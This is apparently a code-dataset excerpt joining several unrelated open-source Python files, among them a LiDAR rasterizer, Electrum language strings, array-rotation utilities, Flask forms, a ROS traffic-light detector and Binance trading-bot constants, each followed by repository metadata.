a = [('s',0.30),
('cd',0.17,'hp70')]
TWD = The_Wyrmclan_Duo
class A_New_Years_Battle(Amulet):
att = 52
a = [('a',0.08,'hp70'),('cc',0.10, 'hit15')]
ANYB = A_New_Years_Battle
class A_Game_of_Cat_and_Boar(Amulet):
att = 33
a = [('bt', 0.25,'light')]
AGoCaB = A_Game_of_Cat_and_Boar
class The_Plaguebringer(Amulet):
att = 50
a = [('k_poison',0.25)]
TP = The_Plaguebringer
class A_Dogs_Day(Amulet):
att = 62
a = [('bt',0.25,'wind'), ('sp',0.1,'wind')]
ADD = A_Dogs_Day
class The_Bridal_Dragon(Amulet):
att = 64
a = [('dp',10),('da',0.18)]
TBD = The_Bridal_Dragon
class A_Suit_of_Midnight(Amulet):
att = 52
a = [('dp',10), ('ag', 3)]
class Primal_Crisis(Amulet):
att = 55
a = [('a', 0.20, 'hit15'), ('cc', 0.10, 'hit15')]
PC = Primal_Crisis
class Felyne_Hospitality(Amulet):
att = 65
a = [('cc', 0.10, 'hp70'), ('bc_crit_damage', 0.15)]
FH = Felyne_Hospitality
class Unexpected_Requests(Amulet):
att = 65
a = [('lo', 0.50), ('lo_crit_chance', 0.30)]
class The_Lurker_in_the_Woods(Amulet):
att = 65
a = [('fs', 0.50), ('bk', 0.25)]
class Prayers_Unto_Him(Amulet):
att = 64
a = [('da', 0.18), ('dt', 0.15)]
class An_Ancient_Oath(Amulet):
att = 65
a = [('da', 0.18), ('dc', 4)]
class The_Fires_of_Hate(Amulet):
att = 65
a = [('k_poison', 0.2), ('a', 0.15, 'hp100')]
class The_Queen_of_the_Knife(Amulet):
att = 52
a = [('cd', 0.13), ('cc', 0.1, 'hit15')]
class Breakfast_at_Valerios(Amulet):
att = 65
a = [('cc', 0.08, 'hp70'), ('a', 0.2, 'hit15')]
class Brothers_in_Arms(Amulet):
att = 65
a = [('bc',0.13), ('bk', 0.25)]
class A_Small_Courage(Amulet):
att = 52
a = [('bc',0.08), ('a', 0.13, 'hp100')]
class The_Red_Impulse(Amulet):
att = 65
a = [('dcs', 3), ('dc', 3)]
class Proper_Maintenance(Amulet):
att = 64
a = [('a', 0.15, 'hp100'),('bt',0.20)]
class His_Clever_Brother(Amulet):
att = 51
a = [('k_frostbite',0.20),('sp',0.05)]
class Memory_of_a_Friend(Amulet):
att = 64
a = [('sp', 0.08), ('a', 0.2, 'hit15')]
class Me_and_My_Bestie(Amulet):
att = 64
a = [('k_burn', 0.30), ('bc_energy', 1)]
class Blossoms_on_the_Waters_Edge(Amulet):
att = 62
a = [('dh', 0.08), ('dp', 0.10)]
class Memories_of_Summers_Dusk(Amulet):
att = 65
a = [('k_stun', 0.2), ('k_paralysis', 0.2)]
class A_Passion_for_Produce(Amulet):
att = 52
a = [('s',0.20), ('cc',0.12)]
| 19.287257
| 62
| 0.568085
|
794b08bd43b98762ba6562865cd0c6ec0fa51309
| 5,882
|
py
|
Python
|
src/surfclass/rasterize.py
|
plimkilde/surfclass
|
0534d6400f0e3636150079ac3bb2cf676f472233
|
[
"MIT"
] | 3
|
2019-10-30T10:05:58.000Z
|
2019-11-08T12:41:33.000Z
|
src/surfclass/rasterize.py
|
plimkilde/surfclass
|
0534d6400f0e3636150079ac3bb2cf676f472233
|
[
"MIT"
] | 17
|
2019-10-25T12:57:34.000Z
|
2019-12-17T08:12:36.000Z
|
src/surfclass/rasterize.py
|
plimkilde/surfclass
|
0534d6400f0e3636150079ac3bb2cf676f472233
|
[
"MIT"
] | 2
|
2019-12-18T15:22:09.000Z
|
2019-12-18T15:39:27.000Z
|
"""Tools for rasterization of LiDAR files."""
import json
import logging
from pathlib import Path
import pdal
from surfclass import lidar, rasterio, Bbox
logger = logging.getLogger(__name__)
dimension_nodata = {
"Z": -999,
"Intensity": 0,
"ReturnNumber": 0,
"NumberOfReturns": 0,
"Classification": 255,
"ScanAngleRank": -999,
"Pulse width": -999,
"Amplitude": -999,
"PointSourceId": 0,
}
class LidarRasterizer:
"""Rasterizes one or more dimensions from one or more LiDAR files.
The underlying LiDAR library is PDAL, so dimension names used must be compatible with PDAL.
Note:
For the time being the following filters are hard coded into this class:
- Ground points only (classification == 2)
- "Pulse width" < 2.55
"""
def __init__(
self,
lidarfiles,
outdir,
resolution,
bbox,
dimensions,
srs,
prefix=None,
postfix=None,
):
"""Inits LidarRasterizer.
Args:
lidarfiles (list of str): List of paths to LiDAR files.
outdir (str): Path to output directory.
resolution (float): Cell size in coordinate system unit.
bbox (Bbox): Bounding box of output raster.
dimensions (list of str): List of LiDAR dimensions to rasterize.
srs (osgeo.osr.SpatialReference): Spatial reference system for the LiDAR files.
prefix (str, optional): Output file(s) prefix. Defaults to None.
postfix (str, optional): Output file(s) postfix. Defaults to None.
"""
self.lidarfiles = (
[lidarfiles] if isinstance(lidarfiles, (str, Path)) else list(lidarfiles)
)
self.outdir = outdir or ""
self.fileprefix = prefix or ""
self.filepostfix = postfix or ""
self.resolution = resolution
self.bbox = Bbox(*bbox)
self.dimensions = self._validate_dimensions(dimensions)
self.pipeline = self._create_pipeline()
self.srs = srs
logger.debug(
"LidarRasterizer init. Outdir: '%s'. Prefix: '%s'. Postfix: '%s' "
"Resolution: %s. Bbox: %s. Dimensions: %s. Files: %s. Pdal pipeline: [%s]",
self.outdir,
self.fileprefix,
self.filepostfix,
self.resolution,
self.bbox,
self.dimensions,
self.lidarfiles,
self.pipeline,
)
def start(self):
"""Starts the processing.
Note:
For the time being the following filters are hard coded into this class:
- Ground points only (classification == 2)
- "Pulse width" < 2.55
Raises:
Exception: If the PDAL pipeline built is not valid.
"""
# Convert the pipeline to stringified JSON (required by PDAL)
pipeline_json = json.dumps(self.pipeline)
pipeline = pdal.Pipeline(pipeline_json)
if pipeline.validate():
pipeline.loglevel = 8 # really noisy
pipeline.execute()
else:
logger.error("Pipeline not valid")
raise Exception("Pipeline not valid.")
logger.debug("Reading data")
data = pipeline.arrays
logger.debug("Data read: %s", data)
# For now just assume one array
points = data[0]
# For now get rid of PulseWidth==2.55
logger.warning("Dropping returns with pulsewidth >= 2.55")
points = points[points[:]["Pulse width"] < 2.55]
sampler = lidar.GridSampler(points, self.bbox, self.resolution)
origin = (self.bbox.xmin, self.bbox.ymax)
for dim in self.dimensions:
logger.debug("Gridding: %s", dim)
nodata = dimension_nodata[dim]
outfile = self._output_filename(dim)
grid = sampler.make_grid(dim, nodata, masked=False)
rasterio.write_to_file(
outfile, grid, origin, self.resolution, self.srs, nodata=nodata
)
def _create_pipeline(self):
# The "merge" filter is not strictly necessary according to https://pdal.io/stages/filters.merge.html#filters-merge
# but lets be explicit about it
pipeline = list(self.lidarfiles)
merge = {"type": "filters.merge"}
pipeline.append(merge)
logger.warning("Filtering away everything but ground")
rangefilter = {
"type": "filters.range",
"limits": "Classification[2:2]", # Ground classification
}
pipeline.append(rangefilter)
# xmin and ymax are inclusive, xmax and ymin are inclusive. Otherwise out gridsampler crashes
xmin, ymin, xmax, ymax = self.bbox
boundsfilter = {
"type": "filters.crop",
"bounds": f"([{xmin}, {xmax - 0.00001}], [{ymin + 0.00001}, {ymax}])",
}
pipeline.append(boundsfilter)
# Build the pipeline by concating the reader, filter and writers
return {"pipeline": pipeline}
def _output_filename(self, dimension):
dimname = dimension.replace(" ", "")
name = f"{self.fileprefix}{dimname}{self.filepostfix}.tif"
return str(Path(self.outdir) / name)
@classmethod
def _validate_dimensions(cls, dimensions):
"""Validates the dimensions given, against PDAL."""
try:
for dim in dimensions:
if not (
any(
pdaldim["name"] == dim
for pdaldim in pdal.dimension.getDimensions()
)
or dim == "Pulse width"
):
raise ValueError(dim, "Dimension not recognized by PDAL")
return dimensions
except ValueError as e:
print("ValueError: ", e)
| 33.804598
| 123
| 0.577355
|
794b0a475094ca12714e0bbe39a682e0449cad3d
| 2,327
|
py
|
Python
|
lib/i18n.py
|
BTCPrivate/electrum-bitcoinprivate
|
d18dbd83353d006136bc986e143e19dbb954c36a
|
[
"MIT"
] | 1
|
2021-04-02T20:35:15.000Z
|
2021-04-02T20:35:15.000Z
|
lib/i18n.py
|
ArdeshirV/electrum-bitcoinprivate
|
d18dbd83353d006136bc986e143e19dbb954c36a
|
[
"MIT"
] | null | null | null |
lib/i18n.py
|
ArdeshirV/electrum-bitcoinprivate
|
d18dbd83353d006136bc986e143e19dbb954c36a
|
[
"MIT"
] | 1
|
2021-04-06T18:34:31.000Z
|
2021-04-06T18:34:31.000Z
|
#!/usr/bin/env python
#
# Electrum - lightweight bitcoinprivate client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import gettext, os
LOCALE_DIR = os.path.join(os.path.dirname(__file__), 'locale')
language = gettext.translation('electrum', LOCALE_DIR, fallback = True)
def _(x):
global language
return language.gettext(x)
def set_language(x):
global language
if x: language = gettext.translation('electrum', LOCALE_DIR, fallback = True, languages=[x])
languages = {
'':_('Default'),
'ar_SA':_('Arabic'),
'cs_CZ':_('Czech'),
'da_DK':_('Danish'),
'de_DE':_('German'),
'eo_UY':_('Esperanto'),
'el_GR':_('Greek'),
'en_UK':_('English'),
'es_ES':_('Spanish'),
'fr_FR':_('French'),
'hu_HU':_('Hungarian'),
'hy_AM':_('Armenian'),
'id_ID':_('Indonesian'),
'it_IT':_('Italian'),
'ja_JP':_('Japanese'),
'ky_KG':_('Kyrgyz'),
'lv_LV':_('Latvian'),
'nl_NL':_('Dutch'),
'no_NO':_('Norwegian'),
'pl_PL':_('Polish'),
'pt_BR':_('Brasilian'),
'pt_PT':_('Portuguese'),
'ro_RO':_('Romanian'),
'ru_RU':_('Russian'),
'sk_SK':_('Slovak'),
'sl_SI':_('Slovenian'),
'ta_IN':_('Tamil'),
'th_TH':_('Thai'),
'vi_VN':_('Vietnamese'),
'zh_CN':_('Chinese')
}
| 32.774648
| 96
| 0.672969
|
794b0b35918b4e5d4f1e8539762032034ed4a539
| 3,545
|
py
|
Python
|
escnn/gspaces/utils.py
|
QUVA-Lab/escnn
|
59ed6b96f61f8616f87b3f25aa2f8abdb6f1a882
|
[
"BSD-3-Clause"
] | 4
|
2022-03-16T22:51:39.000Z
|
2022-03-18T18:45:49.000Z
|
escnn/gspaces/utils.py
|
QUVA-Lab/escnn
|
59ed6b96f61f8616f87b3f25aa2f8abdb6f1a882
|
[
"BSD-3-Clause"
] | null | null | null |
escnn/gspaces/utils.py
|
QUVA-Lab/escnn
|
59ed6b96f61f8616f87b3f25aa2f8abdb6f1a882
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from scipy.ndimage import rotate
from scipy.ndimage import affine_transform
def rotate_array_2d(x, angle):
k = 2 * angle / np.pi
if k.is_integer():
# Rotations by 180 and 270 degrees seem to be not perfect using `ndimage.rotate` and can therefore
# make some tests fail.
# For this reason, we use `np.rot90` to perform rotations by multiples of 90 degrees without interpolation
return np.rot90(x, k, axes=(-2, -1))
else:
return rotate(x, angle * 180.0 / np.pi, (-2, -1), reshape=False, order=2)
def linear_transform_array_3d(x, trafo: np.ndarray, exact=True, order=2):
assert trafo.shape == (3, 3)
assert len(x.shape) > 2
return linear_transform_array_nd(x, trafo, exact, order=order)
def linear_transform_array_nd(x, trafo: np.ndarray, exact=True, order=2):
n = trafo.shape[0]
assert trafo.shape == (n, n)
assert len(x.shape) >= n
# TODO : MAKE THIS EXPLICIT SOMEWHERE IN THE DOCS!!!
# assume trafo matrix has [X, Y, Z, ....] order
# but input tensor has [..., -Z, -Y, X] order
trafo = trafo[::-1, ::-1].copy()
trafo[:-1, :] *= -1
trafo[:, :-1] *= -1
D = len(x.shape)
at = np.abs(trafo)
if exact and (
np.isclose(at.sum(axis=0), 1).all() and
np.isclose(at.sum(axis=1), 1).all() and
(np.isclose(at, 1.) | np.isclose(at, 0.)).all()
):
# if it is a permutation matrix we can perform this transformation without interpolation
axs = np.around(trafo).astype(np.int) @ np.arange(1, n+1).reshape(n, 1)
axs = axs.reshape(-1)
stride = np.sign(axs).tolist()
axs = np.abs(axs).tolist()
axs = list(range(D - n)) + [D - n - 1 + a for a in axs]
assert len(axs) == D, (len(axs), D)
y = x.transpose(axs)
stride = (Ellipsis,) + tuple([slice(None, None, s) for s in stride])
y = y[stride]
return y
else:
trafo = trafo.T
t = np.eye(D)
t[-n:, -n:] = trafo
center = np.zeros(len(x.shape))
center[-n:] = (np.asarray(x.shape[-n:]) - 1) / 2
center[-n:] = -(trafo - np.eye(n)) @ center[-n:]
return affine_transform(x, t, offset=center, order=order)
if __name__ == '__main__':
# test that the exact rotation method produces the same results as the interpolation one
# on all 48 origin-preserving isometries of the voxel grid
import itertools
x = np.random.randn(15, 15, 15)
for p in itertools.permutations([0,1,2]):
M = np.eye(3)[p, :]
for s in itertools.product([-1, 1], repeat=3):
rot = np.asarray(s).reshape(-1, 1) * M
y1 = linear_transform_array_3d(x, rot, True)
y2 = linear_transform_array_3d(x, rot, False, order=2)
y3 = linear_transform_array_3d(x, rot, False, order=3)
assert np.allclose(y2, y1), rot
assert np.allclose(y3, y1), rot
# test that the nd method is equivalent to the 2d one
x = np.random.randn(3, 2, 11, 11)
np.set_printoptions(suppress=True, precision=3, linewidth=100000)
for _ in range(10):
angle = np.random.rand()*2*np.pi
rot = np.asarray([
[np.cos(angle), -np.sin(angle)],
[np.sin(angle), np.cos(angle)],
])
y1 = rotate_array_2d(x, angle)
y2 = linear_transform_array_nd(x, rot)
assert np.allclose(y2, y1), rot
| 33.443396
| 114
| 0.56756
|
794b0b711ed618c2169ef3d94b0beddbfce9a024
| 1,349
|
py
|
Python
|
retrobiocat_web/app/biocatdb/model_forms.py
|
ihayhurst/RetroBioCat
|
d674897459c0ab65faad5ed3017c55cf51bcc020
|
[
"MIT"
] | 9
|
2020-12-01T16:33:02.000Z
|
2022-01-19T20:02:42.000Z
|
retrobiocat_web/app/biocatdb/model_forms.py
|
ihayhurst/RetroBioCat
|
d674897459c0ab65faad5ed3017c55cf51bcc020
|
[
"MIT"
] | 4
|
2020-10-02T14:38:32.000Z
|
2021-08-02T09:23:58.000Z
|
retrobiocat_web/app/biocatdb/model_forms.py
|
ihayhurst/RetroBioCat
|
d674897459c0ab65faad5ed3017c55cf51bcc020
|
[
"MIT"
] | 6
|
2021-01-14T07:48:36.000Z
|
2022-03-20T17:34:27.000Z
|
from flask_wtf import FlaskForm
from wtforms import StringField, SelectField, TextAreaField, SubmitField, BooleanField, DateField
from wtforms.validators import DataRequired, NumberRange, ValidationError, Length
from retrobiocat_web.mongo.models.biocatdb_models import EnzymeType, Sequence, Paper
def is_doi_taken(form, field):
for obj in Paper.objects():
if field.data == obj.doi:
raise ValidationError(f'{field.data} is already in the database')
def is_type_taken(form, field):
for obj in EnzymeType.objects():
if field.data == obj.enzyme_type:
raise ValidationError(f'{field.data} is already an enzyme type in the database')
class PaperInfo(FlaskForm):
short_cit = StringField(validators=[DataRequired()])
doi = StringField(validators=[DataRequired(), is_doi_taken])
journal = StringField()
date = DateField(validators=[DataRequired()])
title = StringField()
authors = StringField()
self_assign = BooleanField(default=False)
tags = StringField()
submit = SubmitField('Save')
class EnzymeTypeForm(FlaskForm):
enzyme_type = StringField(validators=[DataRequired(), Length(max=120), is_type_taken])
full_name = StringField()
other_abbreviations = StringField()
description = TextAreaField(validators=[Length(max=255)])
submit = SubmitField()
| 40.878788
| 97
| 0.733877
|
794b0c29f51a2da6fe2ef871768027ca7da18c0b
| 11,980
|
py
|
Python
|
ros/src/tl_detector/tl_detector.py
|
mjanddy/CarND-Capstone-master
|
d25dcfee64387b187c7c407a5ca6b3003808ffde
|
[
"MIT"
] | null | null | null |
ros/src/tl_detector/tl_detector.py
|
mjanddy/CarND-Capstone-master
|
d25dcfee64387b187c7c407a5ca6b3003808ffde
|
[
"MIT"
] | 1
|
2018-07-27T13:34:39.000Z
|
2018-07-27T13:34:39.000Z
|
ros/src/tl_detector/tl_detector.py
|
wzyanqi/CarND-Capstone
|
92827cd8bc28c53c9d778b23ffa84199885d98cb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import rospy
import numpy as np
from std_msgs.msg import Int32
from geometry_msgs.msg import PoseStamped, Pose
from styx_msgs.msg import TrafficLightArray, TrafficLight
from styx_msgs.msg import Lane
from sensor_msgs.msg import Image
from cv_bridge import CvBridge
from light_classification.tl_classifier import TLClassifier
import tf
import cv2
import yaml
from scipy.spatial import KDTree
import os
STATE_COUNT_THRESHOLD = 4
class TLDetector(object):
def __init__(self):
rospy.init_node('tl_detector')
self.pose = None
self.waypoints = None
self.waypoints_2d = None
self.waypoint_tree = None
self.stateCount = 0
self.image_count = 0
self.state = TrafficLight.RED
self.last_state = TrafficLight.UNKNOWN
self.last_wp = -1
self.state_count = 0
self.camera_image = None
self.lights = []
self.saveImgs = True
if self.saveImgs:
if not (os.path.exists("./saveImgs")):
os.mkdir("./saveImgs")
self.saveCount= 0
config_string = rospy.get_param("/traffic_light_config")
#config_string2 = config_string
#rospy.loginfo("+++++++++++++++Using simulator+++++++++++++++%s",config_string)
self.config = yaml.load(config_string)
#rospy.loginfo("+++++++++++++++Using simulator+++++++++++++++%s",self.config)
isSite = bool(rospy.get_param("~is_siteP", True))
if isSite:
self.usingSimulator = False
rospy.loginfo("+++++++++++++++Using simulator+++++++++++++++")
else:
self.usingSimulator = True
rospy.loginfo("+++++++++++++++Using simulator+++++++++++++++")
self.usingSystemLightState = 0
#self.usingSimulator = 0 if self.config['is_site'] else 1
#self.usingSimulator = bool(rospy.get_param("~is_siteP", False))
self.bridge = CvBridge()
self.light_classifier = TLClassifier(self.usingSimulator)
self.listener = tf.TransformListener()
self.stop_closest_waypoint = []
sub1 = rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)
sub2 = rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)
'''
/vehicle/traffic_lights provides you with the location of the traffic light in 3D map space and
helps you acquire an accurate ground truth data source for the traffic light
classifier by sending the current color state of all traffic lights in the
simulator. When testing on the vehicle, the color state will not be available. You'll need to
rely on the position of the light and the camera image to predict it.
'''
sub3 = rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb)
#sub6 = rospy.Subscriber('/image_color', Image, self.image_cb)
sub6 = rospy.Subscriber('/image_color', Image, self.image_cb,queue_size=1, buff_size=2*52428800)
self.upcoming_red_light_pub = rospy.Publisher('/traffic_waypoint', Int32, queue_size=1)
self.lastTime = rospy.get_time()
rate = rospy.Rate(200)
while not rospy.is_shutdown():
if self.pose and self.waypoints and self.lights:
#get closest waypoint
#closest_waypoint_idx = self.get_closest_waypoint_idx()
#rospy.loginfo('closest_waypoint_index:%s', closest_waypoint_idx)
#self.publish_waypoints(closest_waypoint_idx)
self.InitializeImage = True
light_wp, state = self.process_traffic_lights()
self.find_traffic_lights(light_wp, state)
rospy.loginfo("=============finish initialize image===========")
self.InitializeImage = False
break
rate.sleep()
rospy.spin()
def pose_cb(self, msg):
self.pose = msg
def waypoints_cb(self, waypoints):
self.waypoints = waypoints
if not self.waypoints_2d:
self.waypoints_2d = [[waypoint.pose.pose.position.x, waypoint.pose.pose.position.y] for waypoint in waypoints.waypoints]
self.waypoint_tree = KDTree(self.waypoints_2d)
def traffic_cb(self, msg):
self.lights = msg.lights
def image_cb(self, msg):
"""Identifies red lights in the incoming camera image and publishes the index
of the waypoint closest to the red light's stop line to /traffic_waypoint
Args:
msg (Image): image from car-mounted camera
"""
self.has_image = True
ThisTime = rospy.get_time()
#rospy.loginfo("Time elapsed:%s",ThisTime - self.lastTime)
self.lastTime = ThisTime
self.image_count = self.image_count + 1
THRESHOLD_SAMPLE = 1
#if self.usingSimulator:
#THRESHOLD_SAMPLE = 1
if (self.image_count >= THRESHOLD_SAMPLE):
self.lastTime = rospy.get_time()
self.image_count = 0
self.has_image = True
self.camera_image = msg
light_wp, state = self.process_traffic_lights()
if (state != 0)and self.saveImgs:
iimage = self.bridge.imgmsg_to_cv2(self.camera_image, "rgb8")
h,w,_ = iimage.shape
#rospy.loginfo("image width:%s height:%s state:%s",w,h,state)
if self.usingSimulator:
iimage = iimage[0:int(0.7*h),0:w]
else:
iimage = iimage[0:int(0.7*h),50:int(w-50)]
self.saveImags(iimage, state)
ThisTime = rospy.get_time()
#rospy.loginfo("Time elapsed:%s, light state:%s",ThisTime - self.lastTime,state)
self.find_traffic_lights(light_wp, state)
def saveImags(self, image, state):
dictTL = {0:"R",1:"Y",2:"G",4:"U"}
takeImage = image
if not self.usingSimulator:
lsImageName ="./saveImgs/image0{0:0>5}.jpg".format(self.saveCount)
#rospy.loginfo("save image:%s",lsImageName)
cv2.imwrite(lsImageName, takeImage)
else:
lsImageName ="./saveImgs/{0}_image6{1:0>5}.jpg".format(dictTL[state],self.saveCount)
rospy.loginfo("save image:%s",lsImageName)
cv2.imwrite(lsImageName, takeImage)
self.saveCount += 1
def find_traffic_lights(self,light_wp, state):
'''
Publish upcoming red lights at camera frequency.
Each predicted state has to occur `STATE_COUNT_THRESHOLD` number
of times till we start using it. Otherwise the previous stable state is
used.
'''
if state == TrafficLight.YELLOW:
state = TrafficLight.RED
if self.InitializeImage:
self.last_wp = light_wp
self.upcoming_red_light_pub.publish(Int32(light_wp))
return
if self.state != state:
self.state_count = 0
self.state = state
elif self.state_count >= STATE_COUNT_THRESHOLD:
self.last_state = self.state
light_wp = light_wp if state == TrafficLight.RED else -1
self.last_wp = light_wp
rospy.loginfo("---light changed,wp is:%s state:%s s state:%s",light_wp,state,self.state)
self.upcoming_red_light_pub.publish(Int32(light_wp))
else:
rospy.loginfo("---light remained,wp is:%s state:%s s state:%s",self.last_wp,state,self.state)
self.upcoming_red_light_pub.publish(Int32(self.last_wp))
self.state_count += 1
def get_closest_waypoint(self, x,y):
"""Identifies the closest path waypoint to the given position
https://en.wikipedia.org/wiki/Closest_pair_of_points_problem
Args:
pose (Pose): position to match a waypoint to
Returns:
int: index of the closest waypoint in self.waypoints
"""
#TODO implement
closest_idx = self.waypoint_tree.query([x,y],1)[1]
# check if the closest is ahed or behind the vehicle
closest_coord = self.waypoints_2d[closest_idx]
prev_coord = self.waypoints_2d[closest_idx - 1]
closest_v = np.array(closest_coord)
prev_v = np.array(prev_coord)
pos_v = np.array([x, y] )
val = np.dot(closest_v - prev_v, pos_v - closest_v)
if val > 0:
closest_idx = (closest_idx + 1) % len(self.waypoints_2d)
return closest_idx
def get_light_state(self, light):
    """Determines the current color of the traffic light
    Args:
        light (TrafficLight): light to classify
    Returns:
        int: ID of traffic light color (specified in styx_msgs/TrafficLight)
    """
    # Bypass the classifier entirely and trust the simulator-provided
    # ground-truth state when usingSystemLightState is enabled.
    if self.usingSystemLightState > 0:
        if (self.stateCount > 2):
            #rospy.loginfo("light state:{0}".format(light.state))
            self.stateCount = 0
        self.stateCount = self.stateCount + 1
        return light.state
    cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, "rgb8")
    #cv_image = cv2.cvtColor(cv_image, cv2.COLOR_BGR2RGB)
    #narrow down seaching area of the image
    # Crop to the top 70% of the frame, where traffic lights appear.
    h, w, _ = cv_image.shape
    if self.usingSimulator:
        cv_image = cv_image[0:int(0.7 * h), 0:w]
    else:
        # NOTE(review): both branches apply the same crop; presumably a
        # different crop was intended for real camera footage - confirm.
        cv_image = cv_image[0:int(0.7 * h), 0:w]
    #Get classification
    return self.light_classifier.get_classification(cv_image)
def process_traffic_lights(self):
    """Finds closest visible traffic light, if one exists, and determines its
    location and color
    Returns:
        int: index of waypoint closes to the upcoming stop line for a traffic light (-1 if none exists)
        int: ID of traffic light color (specified in styx_msgs/TrafficLight)
    """
    light = None
    light_wp = None
    # List of positions that correspond to the line to stop in front of for a given intersection
    stop_line_positions = self.config['stop_line_positions']
    if (self.pose):
        car_position = self.get_closest_waypoint(self.pose.pose.position.x, self.pose.pose.position.y)
        #TODO find the closest visible traffic light (if one exists)
        # Only consider lights within 200 waypoints ahead of the car.
        diff = 200
        #for fast get
        # Cache each stop line's closest waypoint index on first use; the
        # stop lines are static, so this lookup only has to happen once.
        if len(self.stop_closest_waypoint) == 0:
            for i, lightP in enumerate(self.lights):
                line = stop_line_positions[i]
                self.stop_closest_waypoint.append(self.get_closest_waypoint(line[0], line[1]))
        #rospy.loginfo("len of waypoints:%s car wp:%s",diff,car_position)
        # Pick the nearest stop line that is at or ahead of the car.
        for i, lightP in enumerate(self.lights):
            tmp_waypoint_idx = self.stop_closest_waypoint[i]
            d = tmp_waypoint_idx - car_position
            if d >= 0 and d < diff:
                diff = d
                light = lightP
                light_wp = tmp_waypoint_idx
    if light:
        rospy.loginfo("car pos:%s closest light idx %s diff:%s", car_position, light_wp, diff)
        if self.InitializeImage:
            #for first image latency
            # NOTE(review): first frame is reported as state 0 to mask
            # classifier warm-up latency - confirm 0 maps to RED here.
            state = 0
        else:
            state = self.get_light_state(light)
        return light_wp, state
    #self.waypoints = None
    return -1, TrafficLight.UNKNOWN
if __name__ == '__main__':
    # Entry point: constructing TLDetector registers subscribers and spins
    # the node; ROSInterruptException is raised on shutdown during spin.
    try:
        TLDetector()
    except rospy.ROSInterruptException:
        rospy.logerr('Could not start traffic node.')
| 36.413374
| 132
| 0.586978
|
794b0cad715b1e543eed3097b92290d9b6fac996
| 1,874
|
py
|
Python
|
src/Utils/sad.py
|
ChrisChV/Binance-Manager
|
840e83e5e5586022ed2b9a181342d32e1e973ab7
|
[
"MIT"
] | null | null | null |
src/Utils/sad.py
|
ChrisChV/Binance-Manager
|
840e83e5e5586022ed2b9a181342d32e1e973ab7
|
[
"MIT"
] | null | null | null |
src/Utils/sad.py
|
ChrisChV/Binance-Manager
|
840e83e5e5586022ed2b9a181342d32e1e973ab7
|
[
"MIT"
] | null | null | null |
from decimal import *

# --- Filesystem layout -------------------------------------------------
_DF_ = "/"
_BINANCE_MODULE_DIR_NAME_ = "Binance"
_KEYS_FILE_NAME_ = ".keys"
_KEYS_FILE_PATH_ = _BINANCE_MODULE_DIR_NAME_ + _DF_ + _KEYS_FILE_NAME_
_CONFIG_FILE_NAME_ = "bm.conf"

# --- Order types -------------------------------------------------------
_ENTRY_TYPE_ = 0
_LOSE_TYPE_ = 1
_PROFIT_TYPE_ = 2

# --- Order states ------------------------------------------------------
_INIT_STATE_ = 0
_WAITING_STATE_ = 1
_OPEN_STATE_ = 2
_FILLED_STATE_ = 3
_CANCELED_STATE_ = 4
_DISABLED_STATE_ = 5

# --- Strategy functions ------------------------------------------------
_FUNCTION_SIMPLE_ = 0
_FUNCTION_HALF_ = 1
_FUNCTION_INFINITE_P_ = 2

# Quantization steps for Decimal rounding of prices and quantities.
PRICE_DECIMALS = Decimal(10) ** -8
QUANTITY_DECIMALS = Decimal(10) ** -5

# Quote assets recognised when splitting a trading pair symbol.
_BINANCE_SYM_LIST_ = ["BNB", 'BTC', 'ETH', 'XRP', 'USDT', 'PAX', 'TUSD', 'USDC', 'USDS']

# --- Database table and column names ----------------------------------
_TRANSACTION_TABLE_NAME_ = "Transaction"
_SYMBOL_COL_NAME_ = "symbol"
_ORDER_TABLE_NAME_ = "Binance_Order"
_TRANSACTION_ID_COL_NAME_ = "transaction_id"
_PRICE_COL_NAME_ = "price"
_QUANTITY_COL_NAME_ = "quantity"
_TYPE_COL_NAME_ = "type"
_STATE_COL_NAME_ = "state"
_BINANCE_ID_COL_NAME_ = "binance_id"
_DATES_TABLE_NAME_ = "Dates"
_ORDER_ID_COL_NAME_ = "order_id"
_DATE_COL_NAME_ = "date"
_FUNCTION_COL_NAME_ = "function"

# --- Config-file sections and options ----------------------------------
_CONFIG_LOGGER_SECTION_ = "Logger"
_CONFIG_TYPE_OPTION_ = "type"
_CONFIG_CONSOLE_VALUE_ = "console"
_CONFIG_TELEGRAM_VALUE_ = "telegram"
_CONFIG_TELEGRAM_TOKEN_OPTION_ = "token"
_CONFIG_TELEGRAM_CHATID_OPTION_ = "chatId"
_CONFIG_INPUT_SECTION_ = "Input"
_CONFIG_HOST_SECTION_ = "host"

# --- JSON message field names ------------------------------------------
_JSON_FUNCTION_ = "function"
_JSON_OPERATION_TYPE_ = "oper_type"
_JSON_SYMBOL_ = "symbol"
_JSON_ENTRY_ = "entry"
_JSON_LOSE_ = "lose"
_JSON_PROFIT_ = "profit"
_JSON_ENTRY_STATE_ = "entry_state"
_JSON_LOSE_STATE_ = "lose_state"
_JSON_PROFIT_STATE_ = "profit_state"
_JSON_QUANTITY_ = "quantity"
_JSON_TRANSACTION_ID_ = "tran_id"
_JSON_STATE_ = "state"

# --- Operation type values carried in the JSON messages ----------------
_PING_OPERATION_TYPE_ = "ping"
_NEW_OPERATION_TYPE_ = "new"
_PROGRESS_OPERATION_TYPE_ = "progress"
_CANCEL_OPERATION_TYPE_ = "cancel"
_DISABLE_OPERATION_TYPE_ = "disable"
_GET_OPEN_OPERATION_TYPE_ = "open"
